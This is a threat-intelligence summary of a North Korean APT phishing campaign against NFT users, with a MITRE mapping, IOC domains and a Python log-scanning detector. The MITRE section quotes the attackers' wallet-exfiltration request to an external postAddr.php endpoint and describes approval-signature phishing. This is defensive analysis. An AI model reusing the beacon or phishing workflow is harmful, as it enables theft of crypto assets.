SlowMist analyzes a North Korean APT operation that carried out a large-scale phishing campaign targeting NFT users, exposing how hundreds of fake NFT domains and decoy mint sites were used to harvest wallet approvals and data. The findings tie this campaign to broader NK-linked phishing activity, detail attacker infrastructure, and describe specific techniques used to exfiltrate data and leverage user approvals. #NorthKoreanAPT #NFTPhishing #PhishingDomains #OpenSea #X2Y2 #Rarible #thedoodles.site #MistTrack #Seaport #Binance #NaverPhishing
Key points
- SlowMist identified a North Korean APT conducting a large-scale phishing campaign aimed at NFT and crypto users, with multiple public mentions and confirmations from security researchers.
- The operation used a broad infrastructure of phishing domains (about 196 named in one report) and was linked to a larger network of NFT phishing sites hosted across IPs, including 372 sites on one IP and 320 on another.
- Attackers created fake NFT-related decoy websites and minted NFTs on platforms like OpenSea, X2Y2, and Rarible to lure victims with seemingly legitimate offers.
- Key data collection techniques included exfiltrating visitor data via HTTP GET requests to an external domain, using /postAddr.php to record wallet addresses, visit times, and visited URLs.
- Phishing sites employed decoy pricing data via getPriceData.php and used an imgSrc.js file to map images to target sites, indicating templated phishing site infrastructure.
- Signature-based phishing was used to induce users to approve transactions (e.g., Seaport and ERC20 signatures), enabling unauthorized asset transfers.
- MistTrack flagged a high-risk phishing address (0xC0fd…e0ca) with over 1,000 NFT transactions and ~300 ETH profit, demonstrating significant financial impact.
MITRE Techniques
- [T1566] Phishing – The North Korean APT group targeted Crypto and NFT users with a phishing campaign using nearly 500 different domain names. – “The North Korean APT group targeted Crypto and NFT users with a phishing campaign using nearly 500 different domain names.”
- [T1059.007] JavaScript – The phishing sites used a script file (imgSrc.js) linking images to the target project and listing hosting locations of image files used on their phishing sites. – “file imgSrc.js linking images to the target project, which contains a list of target sites and the hosting location of the image files used on their corresponding phishing sites.”
- [T1204] User Execution – Attackers induced victims to perform signing actions, such as approving NFT and ERC20 transfers. – “The following code is used to induce victims to perform more common phishing ‘Approve’ operations, such as authorizing NFTs and ERC20 tokens.”
- [T1583] Acquire Infrastructure – The campaign relied on infrastructure such as many domains and hosted sites; earliest domain registrations date back about 7 months. – “The earliest registration date was traced back to 7 months ago.”
- [T1566] Phishing via Web Service/Decoy Websites – The operation used fake NFT-related decoy websites and phishing domains mimicking legitimate NFT platforms to harvest credentials and approvals. – “fake NFT-related decoy websites with malicious Mints” and “nearly 500 different domain names.”
- [T1036] Masquerading – Phishing sites appeared to be NFT projects and marketplaces, deceiving users into interacting with counterfeit pages. – “fake NFT-related decoy websites” and later references to World Cup-themed site.
- [T1041] Exfiltration Over C2 Channel – Visitor data and wallet information were sent to an external domain via HTTP GET requests (e.g., /postAddr.php). – “The hacker records visitors’ information to an external domain through an HTTP GET request. The general format is ‘https://nserva.live/postAddr.php?mmAddr=…[Metamask]…&accessTime=xxx&url=evil.site’.”
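The exfiltration pattern quoted above (an HTTP GET to postAddr.php carrying mmAddr, accessTime and url parameters) can be hunted for in proxy or web logs. The Python below is an added detection example, not code from SlowMist; the log lines and client IPs are constructed, the domain list is taken from this write-up, and the wallet check is only a format check on the 0x-prefixed 40-hex-digit address.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (timestamp, client, method, URL); the first and
# last follow the postAddr.php request format quoted in the SlowMist report.
SAMPLE_LOG = """\
2022-12-20T10:01:02Z 10.0.0.5 GET https://nserva.live/postAddr.php?mmAddr=0x1234567890abcdef1234567890abcdef12345678&accessTime=1671530462&url=evil.site
2022-12-20T10:01:05Z 10.0.0.5 GET https://example-legit.com/api/prices?symbol=ETH
2022-12-20T10:02:10Z 10.0.0.7 GET https://commonj.xyz/getPriceData.php?project=doodles
2022-12-20T10:03:00Z 10.0.0.9 GET https://tothesky.in/postAddr.php?mmAddr=notanaddress&accessTime=1671530580&url=mint.fake
"""

# Domains and endpoints named in the report (assumed exact hostnames, not wildcards).
KNOWN_DOMAINS = {"thedoodles.site", "tothesky.in", "commonj.xyz", "nserva.live"}
SUSPICIOUS_PATHS = {"/postAddr.php", "/getPriceData.php"}
ETH_ADDR = re.compile(r"^0x[0-9a-fA-F]{40}$")


def analyze_request(url):
    """Return a finding dict for one requested URL, or None if nothing matched."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    qs = parse_qs(parts.query)
    reasons = []
    if host in KNOWN_DOMAINS:
        reasons.append("known-domain")
    if parts.path in SUSPICIOUS_PATHS:
        reasons.append("suspicious-path")
    # The exfil beacon is recognisable by its parameter set even on a new domain.
    if "mmAddr" in qs and "url" in qs:
        reasons.append("wallet-exfil-params")
    if not reasons:
        return None
    addr = qs.get("mmAddr", [None])[0]
    return {
        "host": host,
        "path": parts.path,
        "wallet": addr if addr and ETH_ADDR.match(addr) else None,
        "decoy_site": qs.get("url", [None])[0],
        "reasons": reasons,
    }


def scan_log(text):
    """Apply analyze_request to every log line; tag hits with the client IP."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        finding = analyze_request(fields[3])
        if finding:
            finding["client"] = fields[1]
            hits.append(finding)
    return hits
```

The recovered wallet address and decoy site name tell the responder which user visited which phishing site, which is the starting point for checking that wallet's approvals.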
Indicators of Compromise
- [Domain] thedoodles.site – main domain used to monitor user requests; also associated with other NK phishing infrastructure
- [Domain] tothesky.in – observed C2 domain in the phishing infrastructure
- [Domain] commonj.xyz – observed C2 domain in the phishing infrastructure
- [URL] Pastebin URL – https://pastebin.com/UV9pJN2M (phishing domain list)
- [File] imgSrc.js – script file linking images to phishing templates
- [File] getPriceData.php – endpoint used to fetch NFT price data in phishing sites
- [URL] Seaport/Signature-related indicators – references to fake Seaport and approve-signature workflows to harvest approvals